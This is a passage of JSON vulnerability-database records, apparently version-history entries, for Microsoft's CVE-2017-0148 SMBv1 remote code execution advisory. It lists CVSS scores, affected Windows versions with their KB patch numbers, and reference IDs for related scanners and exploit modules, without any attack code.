"msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": 
"Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", 
"kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 
8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T12:46:46", "differentElements": ["msAffectedSoftware"], "edition": 72}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB 
Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-20T14:58:45", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": 
["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", 
"modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012606", "KB4012213", "KB4013198", "KB3210721", "KB4012216", "KB3177186", "KB3205409", "KB3205401", "KB4012212", "KB4013429", "KB4012598", "KB3213986", "KB3212646", "KB4012217", "KBMS16-110, 3187754", "KB3210720", "KB4012215"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems 
Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", 
"kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-20T14:58:45", "differentElements": ["msAffectedSoftware"], "edition": 73}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-21T08:57:08", "history": [], "viewCount": 107, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": 
["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-20T14:58:45", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-20T14:58:45", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012215", "KB3177186", "KBMS16-110, 3187754", "KB3205409", "KB3210720", "KB3213986", 
"KB3205401", "KB4013198", "KB4012598", "KB4012212", "KB3212646", "KB3210721", "KB4012217", "KB4012606", "KB4012214", "KB4012216", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 
(Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": 
""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
